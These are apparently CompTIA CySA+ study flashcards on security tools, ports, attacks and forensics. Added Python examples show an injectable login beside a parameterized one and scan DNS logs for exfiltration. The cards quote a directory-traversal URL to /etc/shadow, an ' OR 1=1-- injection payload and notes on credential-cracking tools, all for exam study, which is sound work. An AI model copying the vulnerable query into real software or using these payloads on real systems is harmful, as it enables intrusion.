- adjust scans to a more appropriate scope - create a new baseline for a heuristic scan - add application to exception list - vulnerability exists but isn't exploitable

SPAN (Switched Port Analyzer)

- allows for the copying of ingress and/or egress communications from one or more switch ports to another (essentially it makes a copy of everything coming in or out of a port and then puts that on a duplicate port so you can then monitor it) - once you have a SPAN port configured you need to enable packet sniffing

aircrack-ng

- allows us to extract the authentication key and try to retrieve the plain text version of your password for that network - effective against all WEP-based networks - RADIUS authentication is an effective mitigation against aircrack-ng

aireplay-ng

- allows us to inject frames to perform attacks to obtain authentication credentials for an access point - this is done by deauthenticating the victim from the access point and then capturing the reauthentication when the victim tries to reconnect

Simple Object Access Protocol (SOAP)

- an XML-based web services protocol that is used to exchange messages - supports authentication, transport security, asynchronous messaging, and built-in error handling (leverage Web Services Security, WS-Security, extensions to enforce integrity and confidentiality via SOAP) (web services using SOAP may be vulnerable to different exploits such as probing, coercive parsing, external references, malware, SQL injection)

Directory Traversal

- an application injection attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory - may be used to access any file on a system with the right permissions (e.g., http://diontraining.com/../../../../etc/shadow) (Unix systems use ../ but Windows systems use ..\) (*WARNING: attackers may use encoding to hide directory traversal attempts, for example, %2e%2e%2f represents ../)

Document Object Model (DOM) XSS

- an attack that exploits the client's web browser using *client-side* scripts to modify the content and layout of a webpage - runs with the logged in user's privileges of the local system

Reverse Shell

- an attacker opens a listening port on the remote host and causes the infected host to connect to it - is used to exploit organizations that have not configured outbound traffic filtering at the firewall - attackers use Netcat (nc) to perform these actions

Secure Multipurpose Internet Mail Extensions (S/MIME)

- an email encryption standard that adds digital signatures and public key cryptography to traditional MIME communications - in order for this to work, a user is issued a digital certificate containing his or her public key in order to use S/MIME

Active Scan (Vulnerability Scanner Types)

- an enumeration or vulnerability scan that analyzes the responses from probes sent to a target (consumes network bandwidth and processor resources) - can be configured as a credentialed, non-credentialed, server-based, or agent-based scan

Vulnerability Assessment

- an evaluation of a system's security and ability to meet compliance requirements based on the configuration state of the system as represented by information collected from the system (3 main steps) 1. collect a set of target attributes 2. analyze the differences in the current and baseline configurations 3. report the results

Factors Indicating a DDoS Attack

- an excessive number of TIME_WAIT connections in a load balancer or web servers state table - high numbers of HTTP 503 Service Unavailable log events - if you see a large amount of outbound traffic from your network, it could indicate your network contains victimized hosts being used in a DDoS against other people - IOCs with DDoS attack include bandwidth consumption and traffic spikes (*but these can be indicators for other types of attacks too)

Mimikatz

- an open-source application that allows users to view and save authentication credentials in order to perform pass-the-hash attacks - scans system memory for cached passwords processed by the Local Security Authority Subsystem Service (lsass.exe)

hping

- an open-source spoofing tool that provides a pentester with the ability to craft network packets to exploit vulnerable firewalls and IDS/IPS - host/port detection and firewall testing - timestamping - traceroute - fragmentation - DoS

What is the difference between Behavioral Analysis and Anomaly Analysis?

- anomaly analysis uses prescribed patterns (like an RFC or industry standard), whereas behavioral analysis records expected patterns in relation to the device being monitored - in other words, with anomaly analysis we are looking at everything following a standard - with behavioral analysis we are making up our own standard based on the observed patterns on that device

Input Validation

- any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application - can be conducted locally (on client) or remotely (on server) (*WARNING: client-side input validation is more dangerous since it is vulnerable to malware interference) (server-side input validation can be time and resource intensive) (useful against XML, SQL, Directory Traversal, XSS injection attacks)

Irregular Peer-to-Peer (P2P) Communication

- attack indicator where hosts within a network establish connections over unauthorized ports or data transfers - attackers commonly use Server Message Block (SMB) since it is typical within Windows File/Printer sharing environments

How can you mitigate a DGA?

- best mitigation is to use a Secure Recursive DNS Resolver - occurs when one trusted DNS server communicates with several other trusted DNS servers to hunt down an IP address and returns it to the client

Unprotected Storage (Cloud Threats)

- cloud storage containers are referred to as buckets (AWS) or blobs (Azure) - incorrect permissions may occur due to default read/write permissions leftover from creation - incorrect origin settings may occur when using content delivery networks (CORS policy) (*WARNING: Access control to storage is administered through container policies, IAM authorizations, and object ACLs)

ELK/Elastic Stack

- collection of free and open-source SIEM tools that provides storage, search and analysis functions - made up of 4 different components: Elasticsearch (query/analytics), Logstash (log collection/normalization), Kibana (visualization), Beats (endpoint collection agents)

Covert Channels

- communication path that allows data to be sent outside of the network without alerting any intrusion detection or data loss countermeasures - covert channels enable the stealthy transmission of data from node to node using means that your security controls do not anticipate

Physical Access Control System (PACS)

- components and protocols that facilitate the centralized configuration and monitoring of security mechanisms within offices and data centers - can either be implemented as part of a building automation system (BAS) or a separate system (*WARNING: PACS are often installed and maintained by an external supplier and are therefore omitted from risk and vulnerability assessments by analysts)

Bus Encryption

- data is encrypted by an application prior to being placed on the data bus - ensures that the device at the end of the bus is trusted to decrypt the data

Features of MDM/EMM systems

- device enrollment and authentication (asset tracking) - remote lock and remote wipe - identifying device locations - patch and update deployments - preventing root/jailbreaks - create encrypted containers for data - restricting features/services of applications - can be used to manage incidents and conduct investigations

Code Injection

- exploit technique that runs malicious code with the identification number of a legitimate process - techniques include: masquerading (where your dropper is going to replace a genuine executable with a malicious one), DLL injection (where the dropper forces a process to load the malicious code as a DLL), DLL sideloading (where the dropper is going to exploit a vulnerability in a legitimate program's manifest to load a malicious DLL at runtime), and process hollowing (this is when a dropper starts a process in a suspended state and then rewrites the memory locations containing the process code with the malware code)

Living Off the Land *

- exploit techniques that use standard system tools and packages to perform intrusions - detection of an adversary is more difficult when they are executing malware code within standard tools and processes

SIEM Queries

- extracts records from among all the data stored for review or to show as visualization - uses Select (some fields), Where (some set of conditions), Sorted By (some fields)

What are 2 anti-tamper mechanisms to protect your systems?

- field programmable gate array (FPGA) - physically unclonable function (PUF)

How are SMTP logs typically formatted and what will we typically see in these types of logs?

- formatted in request/response fashion - see things like time of request/response, address of recipient, size of message and status code

Fingerprinting *

- identifying the type and version of an operating system (or server application) by analyzing its responses to network scans (targeting one machine) - tools that perform host system detection to map out open ports, OS type and version, file shares, running services and applications, system uptime, and other useful metadata

Patch Management

- identifying, testing, and deploying OS and application updates (fixing security bugs) - classified as critical, security-critical, recommended, and optional

How can you detect a DGA/Fast Flux Network?

- if you start seeing a lot of call-outs from your systems to random-looking domain names like these (A1ZWBR93.com, 94ZGYS9.com, etc) - if you get a high rate of NXDOMAIN errors when resolving DNS names

Sensitive Personal Information (SPI)

- information about a subject's opinions, beliefs, and nature that is afforded specially protected status by privacy legislation - the GDPR definition of SPI includes religious beliefs, political opinions, trade union membership, gender, sexual orientation, racial or ethnic origin, genetic data, and health information

How can we mitigate/prevent Buffer Overflow attacks?

- input validation - ASLR - run programs with least privilege

What are the 4 major threats facing the Cloud?

- insecure API - improper key management - insufficient logging and monitoring - unprotected storage

Certificate Management includes

- installing, updating, and validating trusted root certificates - deploying, updating, and revoking subject certificates - preventing the use of self-signed certificates - SSH key management (cryptographic key pairs)

Benefits of DevSecOps

- integrate security from the beginning - test during and after development - automate compliance checks

Open-Source Intelligence (OSINT)

- publicly available information plus the tools used to aggregate and search it - sources: publicly available information, social media, HTML code, metadata

Firewalking

- reconnaissance technique to enumerate firewall configuration and attempt to probe hosts behind it - occurs when an attacker can find an open port on the firewall, then sends a packet with a TTL of one past the firewall to find its hosts

Port Security

- refers to the blocking of unauthorized application service ports on hosts and firewalls, or the physical and remote access ports used to allow a host to communicate on the local network - recommendations: disable web administrative interfaces and use SSH shells instead for increased security

How do you mitigate false negatives when performing a vulnerability scan?

- run repeated scans - use different scan types (or different scanner) - use different sensitivities

Benefits of a SOAR

- scans security/threat data - analyze it with ML (machine learning) - automate data enrichment process - provision new resources (incident response)

Common Platform Enumeration (CPE)

- scheme for identifying hardware devices, operating systems, and applications, maintained by the MITRE Corporation - database of different fingerprint signatures (this is how nmap is able to run fingerprint scans)

Nmap Scripting Engine (NSE)

- scripts are written in the Lua scripting language that can be used to carry out detailed probes - includes: OS detection and platform enumeration, Windows user account discovery, identify logged-on Windows user, basic vulnerability detection, get HTTP data and identify applications, and geolocation to traceroute probes

What are some benefits to using a CASB?

- single sign-on - malware and rogue device detection - monitor/audit user activity - mitigate data exfiltration

Premise Systems

- systems used for building automation and physical access security - many system designs allow the monitoring to be accessible from the corporate data network or even directly from the Internet

Persistence *

- the ability of a threat actor to maintain covert access to a target host or network - usually relies on modifying the Registry or a system's scheduled tasks

Secure Enclave

- the extensions allow a trusted process to create an encrypted container for sensitive data (helps prevent buffer overflow attacks) - store encryption keys and other sensitive data

File Signature (or Magic Number)

- the first two bytes of a binary header that indicate its file type - a Windows portable executable file will always start with 4D 5A in hex, MZ in ASCII, or TV in Base64 encoding

Attack Surface

- the points at which a network or application receives external connections or inputs/outputs that are potential vectors to be exploited by a threat actor - 3 main areas to consider: the holistic network, websites or cloud-services, custom software applications

File Carving

- the process of extracting data from a computer when that data has no associated file system metadata - attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files or at least parts of those files

Digital Forensics

- the process of gathering and submitting computer evidence to trial and interpreting that evidence by providing expert analysis - uses specialist tools and skills to recover information from computer systems, memory and storage

Threat Modeling

- the process of identifying and assessing the possible threat actors and attack vectors that pose a risk to the security of an app, network or other system - 3 main areas to consider: Adversary Capability, Attack Surface, Attack Vector

Data enrichment

- the process of incorporating new updates and information to an organization's existing database to improve accuracy - when data enrichment is occurring, it could combine a threat intelligence feed with a log of NetFlow. This will allow an analyst to know if an IP address of interest is actually associated with a known APT (AI-based systems combine indicators from multiple threat feeds to reduce false positives and false negatives) (AI-based systems can identify obfuscated malware better than their human counterparts)

System Hardening *

- the process of securing a system's configuration and settings to reduce IT vulnerability and the possibility of being compromised (one of the most effective preventative measures when designing the system's security) - includes deactivating unnecessary components (ports, processes, applications, etc), disabling unused user accounts (guest, ex-employee), implementing patch management, restricting host access to peripherals (USB, Bluetooth) and restricting shell commands

Software Development Life Cycle (SDLC)

- the processes of planning, analysis, design, implementation, and maintenance that govern software and systems development - it is important to integrate security controls into each stage of the SDLC - Waterfall and Agile methods

System Assessments

- the systematic identification of critical systems by compiling an inventory of the business processes and the tangible and intangible assets and resources that support those processes - conducted to better posture an organization to reduce risk and prevent losses - consider the people, tangible assets, intangible assets and procedures

Pivoting

- the use of one infected computer to attack a different computer - uses the compromised system to attack other systems on the same network to avoid restrictions such as firewall configurations

When using tcpdump, which option or flag would you use to record the ethernet frames during a packet capture?

-e

While performing a vulnerability scan, Christina discovered an administrative interface to a storage system is exposed to the internet. She looks through the firewall logs and attempts to determine whether any access attempts have occurred from external sources. Which of the following IP addresses in the firewall logs would indicate a connection attempt from an external source?

192.186.1.100

-r-------- filename

400

-rw-r--r-- filename

644

-rwxr-x--- filename

750

-rwxrwxrwx filename

777

A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active?

A zone transfer

Egress Filtering

ACL rules that are applied to traffic leaving a network to prevent malware from communicating to C2 (Command and Control) servers

SLE (single loss expectancy) x ARO (annual rate of occurrence) =

ALE (annual loss expectancy)

________ and ________ are part of Sysinternals and can analyze privileges applied to a file or resource

AccessChk, AccessEnum

You are reviewing a rule within your organization's IDS. You see the following output:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; flow:to_client,established; file_data; content:"recordset"; offset:14; depth:9; content:".CacheSize"; distance:0; within:100; pcre:"/CacheSize\s*=\s*/"; byte_test:10,>,0x3ffffffe,0,relative,string; metadata:policy max-detect-ips drop, service http; reference:cve,2016-8077; classtype:attempted-user; sid:65535; rev:1;)

An inbound malicious TCP packet

You have been asked to review the SIEM event logs for suspected APT activity. You have been given several indicators of compromise, such as a list of domain names and IP addresses. What is the BEST action to take in order to analyze the suspected APT activity?

Analyze the trends of events while manually reviewing them to see if any indicators match

Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect when an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?

Behavior

Which programming languages are extremely vulnerable to buffer overflow attacks? *

C/C++ (strcpy in C/C++ does not perform boundary checking of buffers)

Vehicles connect numerous subsystems over a ______

CAN (controller area network)

You are conducting a forensic analysis of a hard disk and need to access a file that appears to have been deleted. Upon analysis, you have determined that data fragments from the file exist scattered across the unallocated and slack space of the drive. Which technique could you use to recover the data?

Carving

How do you use Hashcat?

hashcat -m <HashType> -a <AttackMode> -o <OutputFile> <InputHashFile>

Port 68 (UDP)

DHCP (client port for DHCP)

Port 67 (UDP)

DHCP (server port for DHCP)

During the analysis of data as part of ongoing security monitoring activities, which of the following is NOT a good source of information to validate the results of an analyst's vulnerability scans of the network's domain controllers?

DMARC and DKIM

_____ is an effective command and control channel since it doesn't need a direct connection to the outside network and instead can use a local DNS resolver

DNS

Sender Policy Framework (SPF)

DNS record identifying hosts authorized to send mail for the domain, with only one being allowed per domain (e.g., TXT @ v=spf1 mx include:_spf.google.com include:email.freshdesk.com -all)

how do you create a rule to send an alert if multiple user log-on failures occur within one hour from a single account

Error.LogonFailure > 3 AND LogonFailure.User AND Duration < 1 hour

Port 21 (TCP)

FTP (file transfer protocol)

Port 80 (TCP)

HTTP (HyperText Transfer Protocol)

Port 8080 (TCP)

HTTP-PROXY (HTTP proxy service or alternate port for HTTP)

Port 443 (TCP)

HTTPS

Port 143 (TCP)

IMAP (internet message access protocol)

Port 993 (TCP)

IMAPS (over SSL/TLS)

How do you know if it's legitimate DNS traffic or an IOC?

IOC #1: same query is repeated several times when a bot is checking into a control server for more orders (normal DNS queries happen once) IOC #2: commands sent within request or response queries will be longer and more complicated than normal

Port 631 (UDP port)

IPP (internet printing protocol)

Data in transit is protected by transport encryption protocols like

IPsec (using VPNs), TLS (connecting over the web), or WPA2 (local area network)

Port 500 (UDP port)

ISAKMP (internet security association and key management protocol that is used to set up IPsec tunnels)

Response Code 500 (URL Analysis)

Indicates a general error on the server-side of the application

You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first?

L3 cache (cache memory)

Security Development Life Cycle (SDL)

Microsoft's security framework for application development that supports dynamic development processes (agile method)

Port 123 (UDP)

NTP (network time protocol)

Port 138 (UDP)

NetBIOS-DGM (NetBIOS datagram service supports Windows File Sharing with pre-Windows 2000 version hosts)

Port 137 (UDP)

NetBIOS-NS (NetBIOS name service supports Windows File Sharing with pre-Windows 2000 version hosts)

Port 139 (UDP)

NetBIOS-SSN

Port 139 (TCP)

NetBIOS-SSN (NetBIOS session service supports Windows File Sharing with pre-Windows 2000 version hosts) (Windows only)

Email Harvesting

OSINT techniques used to gather email addresses for a domain

While studying for your CompTIA CySA+ course at Dion Training, you decided you want to install a SIEM to collect data on your home network and its systems. You do not want to spend any money purchasing a license, so you decide to use an open-source option instead. Which of the following SIEM solutions utilize an open-source licensing model?

OSSIM

OODA Loop (Don't Need to Know for Exam but for the Real World)

Observe, Orient, Decide, Act (continuous loop)

Shimcache

an application usage cache that is stored in the Registry as the key (HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\AppCompatCache\AppCompatCach)

To prevent directory traversals and file inclusion attacks, use proper __________

input validation

Port 110 (TCP)

POP3 (post office protocol is a legacy mailbox access protocol)

Port 995 (TCP)

POP3S (over SSL/TLS)

Port 1723 (TCP)

PPTP (point-to-point tunneling protocol is a legacy VPN protocol with weak security implementation)

Port 3389 (TCP)

RDP (remote desktop protocol) (Windows only)

Port 520 (UDP port)

RIP (routing information protocol)

Port 111 (TCP)

RPCBIND (maps remote procedure call (RPC) services to port numbers in a UNIX-like environment) (Unix, Linux, MacOS only)

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?

Returns all webpages containing an email address affiliated with diontraining.com

Windows has two types of autorun keys: (keys attackers use to gain persistence)

Run, RunOnce

AV (asset value) x EF (exposure factor/probability) =

SLE (single loss expectancy)

Port 25 (TCP)

SMTP (simple mail transfer protocol)

Port 161 (UDP)

SNMP (agent port for SNMP)

Port 162 (UDP)

SNMP (management station port for receiving SNMP trap messages)

Port 22 (TCP)

SSH/SFTP (Secure File Transfer Protocol)

You are conducting an investigation on a suspected compromise. You have noticed several files that you don't recognize. How can you quickly and effectively check if the files have been infected with malware?

Submit the files to an open-source intelligence provider like VirusTotal

Port 514 (UDP port)

Syslog (server port for a syslog daemon)

Attackers now use domain generation algorithms to overcome blacklists (T/F)

T

Port 69 (UDP)

TFTP (trivial file transfer protocol)

You just received a notification that your company's email servers have been blacklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails?

The full email header from one of the spam messages

Posture Assessment

The process of assessing the endpoint for compliance with the health policy (health policy refers to a list of things that we're going to check for that device and see if it has and meets certain standards/requirements)

Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices?

User and Entity Behavior Analytics (UEBA)

Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system?

Whitelisting

icacls

Windows command-line tool for showing and modifying file permissions (N - no access, F - full access, R - read only, RX - read and execute, M - modify, W - write, D - delete)

Local Users and Groups (new accounts)

Windows tool that is used for the management of local accounts on a system

Legal Hold (Forensic Procedures)

a process designed to preserve all relevant information when litigation (lawsuit) is reasonably expected to occur

System Memory Image Acquisition

a process that creates an image file of the system memory that can be analyzed to identify the processes that are running, the contents of temporary file systems, Registry data, network connections, cryptographic keys and more

Disk Image Acquisition

a process that creates an image file of the system's disks that can be analyzed to identify current, deleted, and hidden files on a given disk (hard drive, solid state drive, USB thumb drive, etc)

Field Programmable Gate Array (FPGA)

a processor that can be programmed to perform a specific function by a customer rather than at the time of manufacture

Idempotence

a property of IaC that an automation or orchestration action always produces the same result, regardless of the component's previous state

Trusted Automated eXchange of Indicator Information (TAXII - Indicator Management)

a protocol for supplying codified information to automate incident detection and analysis

Infrastructure as Code (IaC)

a provisioning architecture in which deployment of resources is performed by scripted automation and orchestration (allows for the use of scripted approaches to provisioning infrastructure in the cloud, making it more secure) (robust orchestration can lower overall IT costs, speed up deployments, and increase security) (uses carefully developed and tested scripts and orchestration runbooks to generate consistent builds)

whois

a public listing of all registered domains and their registered administrators

Key Performance Indicators (KPIs)

a quantifiable measure used to evaluate the success of an organization, employee, or other element in meeting objectives for performance

Penetration Test

a red team attempts to conduct an intrusion of the network using a specific scenario based on threat modeling

Deep Learning

a refinement of machine learning that enables a machine to develop strategies for solving a task given a labeled dataset and without further explicit instructions (uses complex classes of knowledge defined in relation to simpler classes of knowledge to make more informed determinations about an environment)

Indicators of Compromise (IoC)

a residual sign that an asset or network has been successfully attacked or is continuing to be attacked (evidence that an attack was successful)

Common Vulnerability Scoring System (CVSS)

a risk management approach to quantifying vulnerability data and then taking into account the degree of risk to different types of systems or information

Data Steward

a role focused on the quality of the data and associated metadata

Data Custodian

a role responsible for handling the management of the system on which the data assets are stored (e.g., System Administrator)

Privacy Officer

a role responsible for the oversight of any PII/SPI/PHI assets managed by the company

Classification (DLP Discovery and Classification)

a rule based on a confidentiality classification tag or label attached to the data

Compliance Scans

a scan based on a compliance template or checklist to ensure the controls and configuration settings are properly applied to a given target or host (*PCI DSS which requires a quarterly scan*)

Sweep

a scan directed at multiple IP addresses to discover whether a host responds to connection requests for particular ports

Fast/Basic Assessment Scan

a scan that contains options for analyzing hosts for unpatched software vulnerabilities and configuration issues

Service-Oriented Architecture (SOA)

a software architecture where components of the solution are conceived as loosely coupled services not dependent on a single platform type or technology (is an overall design architecture for mapping business workflows to the IT systems that support them)

awk (scripting tools)

a scripting engine geared toward modifying and extracting data from files or data streams in Unix, Linux, and MacOS systems

Bash (scripting tools)

a scripting language and command shell for Unix-like systems that is the default shell for Linux and MacOS

PowerShell (scripting tools)

a scripting language and command shell for Windows

Shodan (shodan.io)

a search engine optimized for identifying vulnerable internet-attached devices

Virtual Private Network (VPN)

a secure tunnel created between two endpoints connected via an unsecure network, usually over the Internet (IPsec, SSH, TLS are all forms of VPNs)

Forward Proxy (CASB)

a security appliance or host positioned at the client network edge that forwards user traffic to the cloud network if the contents of that traffic comply with policy (*WARNING: users may be able to evade the proxy and connect directly*)

Identity and Access Management (IAM)

a security process that provides identification, authentication, and authorization mechanisms for users, computers, and other entities to work with organizational assets like networks, operating systems, and applications

Data Owner

a senior (executive) role with ultimate responsibility for maintaining the CIA of the information asset (is responsible for labeling the asset and ensuring that it is protected with appropriate controls)

Forward Proxy

a server that mediates the communications between a client and another server, can filter or modify communications, and provides caching services to improve performance

Dictionary (DLP Discovery and Classification)

a set of patterns that should be matched

Traffic Spikes

a sharp increase in connection requests in comparison with a given baseline

Indicator of Compromise (IOCs)

a sign that an asset or network has been attacked or is currently under attack

Intrusion Detection System (IDS)

a software and/or hardware system that scans, audits, and monitors the security infrastructure for signs of attacks in progress

Intrusion Prevention System (IPS)

a software and/or hardware system that scans, audits, and monitors the security infrastructure for signs of attacks in progress and can actively block the attacks

Representational State Transfer (REST)

a software architectural style that defines a set of constraints to be used for creating web application services (supports HTTP, XML, CSV, or JSON formatted messages)

Serverless

a software architecture that runs functions within virtualized runtime containers in a cloud rather than on dedicated server instances (depends on orchestration) (everything in serverless is developed as a function or microservice) (eliminates the need to manage physical or virtual servers) (benefits include: no patching, no administration, no file system monitoring) (e.g., Netflix)

Microservices

a software architecture where components of the solution are conceived as highly decoupled services not dependent on a single platform type or technology (is a design paradigm applied to application development)

Amcache

an application usage cache that is stored as a hive file at (C:\Windows\appcompat\Programs\Amcache.hve)

permissions

all types of permissions should be reviewed and reinforced after an incident (change your password)

Multipurpose Internet Mail Extensions (MIME)

allows a body of an email to support different formats, such as HTML, rich text format (RTF), binary data encoded as Base64 ASCII characters, and attachments

airodump-ng

allows us to capture wireless frames that are going across the air, identify information about the wireless access point based on its MAC address, and identify clients based on their MAC address

airmon-ng

allows us to enable/disable monitor mode on our cards

a Memory Analysis tool ...

allows you to reverse engineer the code used by processes, discover how processes interact with the file system (handles) and Registry, examine network connections, retrieve cryptographic keys, and extract strings from the system memory (this can all be done once you have a memory dump)

Port Hopping

an APT's C2 application might use any port to communicate and may jump between different ports

Open Vulnerability and Assessment Language (OVAL)

an XML schema for describing system security state and querying vulnerability reports and information

Extensible Configuration Checklist Description Format (XCCDF)

an XML schema for developing and auditing best-practice configuration checklists and rules

Security Assertions Markup Language (SAML)

an XML-based data format used to exchange authentication information between a client and a service (pairs with the SOAP protocol) (provides SSO and federated identity management)

Jitter (beaconing)

an adversary's use of a random delay to frustrate indicators based on regular connection attempt intervals

Agent-based (Data Normalization)

an agent service is installed on each host to log, filter, aggregate and normalize data on the host before sending it to the SIEM server for analysis and storage

Data Sharing and Use Agreement

an agreement that sets forth the terms under which personal data can be shared or used

Interconnection Security Agreement (ISA)

an agreement used by federal agencies to set out a security risk awareness process and commit the agency and supplier to implementing security controls

Lessons Learned

an analysis of events that can provide insight into how to improve response processes in the future

Hardware Security Module (HSM)

an appliance for generating and storing cryptographic keys that is less susceptible to tampering and insider threats than software-based storage

Reverse Proxy (CASB)

an appliance positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with policy (*WARNING: this approach can only be used if the cloud application has proxy support*)

Implementation Tiers

assesses how closely core functions are integrated with the organization's overall risk management process and each tier is classed as Partial (low on scale), Risk Informed, Repeatable, and Adaptive (high on scale)

SQL Injection

attack consisting of the insertion or injection of an SQL query via input data from the client to a web application (e.g., ' OR 1=1-- supplied in a login field to make the WHERE clause always true)
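
The same login query written the vulnerable way and the safe way, as an added example that is not part of the original study set. It uses an in-memory SQLite database with constructed rows; the plaintext passwords are only to keep the example short (a real system stores hashes):

```python
"""Added example: SQL injection through string-built queries vs. parameterized ones.

Rows are constructed; plaintext passwords are for brevity only.
"""
import sqlite3
from typing import Optional, Tuple

PAYLOAD = "' OR 1=1--"   # closes the quoted literal, adds a true clause, comments out the rest


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password: str) -> Optional[Tuple[str, str]]:
    """Builds the statement by string interpolation, so input can change its structure."""
    query = ("SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str,
               password: str) -> Optional[Tuple[str, str]]:
    """Parameterized: the driver sends values separately, so they can never become SQL."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "x"))   # first row comes back
    print("safe      :", login_safe(db, PAYLOAD, "x"))         # no match
    print("legit     :", login_safe(db, "bob", "hunter2"))
```

With the payload as the username, the interpolated statement becomes `... WHERE username = '' OR 1=1--' AND password = 'x'`, which returns the first user in the table regardless of password; the parameterized version looks for a literal username of `' OR 1=1--` and finds nothing.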

Fragmentation (hping)

attempts to evade detection by IDS/IPS and firewalls by sending fragmented packets across the network for later reassembly (fragmentation and DoS not likely to be effective against most modern OS and network appliances)

IOC for Data Exfiltration using Explicit Tunnels

atypical endpoints involved in tunnels (VPN/SSH connections) due to their geographic location

IOC for Data Exfiltration using DNS

atypical query types being used, such as TXT, MX, CNAME, and NULL
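
A small scanner that applies this IOC to resolver log lines, added here as an example (not code from the original study set). The log lines are constructed, the field layout `client= type= name=` is an assumed format, and the 24-character label length and 3.0-bit entropy cut-offs are assumed thresholds:

```python
"""Added example: flag DNS queries that show data-exfiltration traits.

Constructed resolver log lines; the client=/type=/name= layout and the
label-length and entropy thresholds are assumptions for illustration.
"""
import math
import re
from collections import Counter
from typing import Dict, List

DNS_LOG = [
    "2024-05-01T10:00:01Z client=10.1.0.22 type=A name=www.example.com",
    "2024-05-01T10:00:02Z client=10.1.0.22 type=AAAA name=cdn.example.com",
    "2024-05-01T10:00:05Z client=10.1.0.31 type=TXT name=4a6f686e2053616c7479.c2.example.net",
    "2024-05-01T10:00:06Z client=10.1.0.31 type=NULL name=5061737377307264.c2.example.net",
    "2024-05-01T10:00:07Z client=10.1.0.22 type=MX name=example.com",
]

LINE_RE = re.compile(r"client=(\S+) type=(\S+) name=(\S+)")
ATYPICAL_TYPES = {"TXT", "NULL", "MX", "CNAME"}   # the record types the card lists


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded or encrypted payloads score well above hostnames."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def query_reasons(qtype: str, name: str, max_label_len: int = 24,
                  min_entropy: float = 3.0) -> List[str]:
    """Return the reasons a single query looks like a tunnel; empty means benign."""
    reasons = []
    if qtype in ATYPICAL_TYPES:
        reasons.append(f"atypical-type:{qtype}")
    first_label = name.rstrip(".").split(".")[0]    # exfil data rides in the leftmost label
    if len(first_label) > max_label_len:
        reasons.append(f"long-label:{len(first_label)}")
    entropy = shannon_entropy(first_label)
    if entropy >= min_entropy:
        reasons.append(f"high-entropy:{entropy:.2f}")
    return reasons


def scan(lines: List[str]) -> List[Dict[str, object]]:
    hits = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        client, qtype, name = m.groups()
        reasons = query_reasons(qtype, name)
        if reasons:
            hits.append({"client": client, "type": qtype, "name": name, "reasons": reasons})
    return hits


def per_client(hits: List[Dict[str, object]]) -> Counter:
    """How many suspicious queries each client made; a tunnel produces many."""
    return Counter(str(h["client"]) for h in hits)


if __name__ == "__main__":
    for hit in scan(DNS_LOG):
        print(hit["client"], hit["type"], hit["name"], ", ".join(hit["reasons"]))
    print(per_client(scan(DNS_LOG)))
```

Record type alone is a weak signal (mail servers issue MX lookups all day), so the per-client count and the label entropy matter more than any single hit; a workstation that sends a stream of high-entropy TXT or NULL queries to one domain is the pattern worth chasing.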

Spoofing attacks can be mitigated by configuring _________ for email server systems

authentication (sender authentication records and signatures such as SPF, DKIM, and DMARC)

Command and control network hosts ...

can be difficult to identify or block since they change DNS names and IP addresses using domain generation algorithms (DGA) and fast flux DNS

Process and Memory Analysis (Virtualization Forensics)

can be performed by VM introspection (VMI) or by analyzing saved-state files

a Registry viewer tool

can extract the Windows Registry files from an image and display them on the analysis workstation

The Microsoft Policy Analyzer ...

can identify whether a policy deviates from a configuration baseline

Disk utilization tools ...

can scan a file system and retrieve comprehensive statistics (e.g., a visual representation, a directory listing, real-time usage of data being written)

Full Packet Capture (FPC)

captures the entire packet including the header and the payload for all traffic entering and leaving a network

classtype (rule options)

categorizes the attack (bruteforce, DoS, etc)

Slashdot Effect (slashdotting)

a sudden surge of traffic that crashes or overwhelms a smaller website after it is linked from a high-traffic site such as Slashdot, Reddit, or Twitter (an unintentional denial of service)

What is one type of DoS attack method?

causing an application to overrun its memory buffer to trigger an execution failure

Atomic Execution

certain operations that should only be performed once or not at all, such as initializing a memory location (helps prevent buffer overflow attacks and race conditions)

Digital Rights Management (DRM)

copyright protection technologies for digital media that attempt to mitigate the risk of unauthorized copies being distributed

Analysis (Forensic Procedures)

create a copy of evidence for analysis and use repeatable methods and tools during analysis

Reporting (Forensic Procedures)

create a report of the methods and tools used in investigation and present detailed findings and conclusions based on the analysis

PUT (URL Analysis)

creates or replaces the requested resource

Fieldbus

digital serial data communications used in operational technology networks to link PLCs

BYOD policies complicate ______ _________ since you may not be able to legally search or seize the device

data acquisition

Insecure API (Cloud Threats)

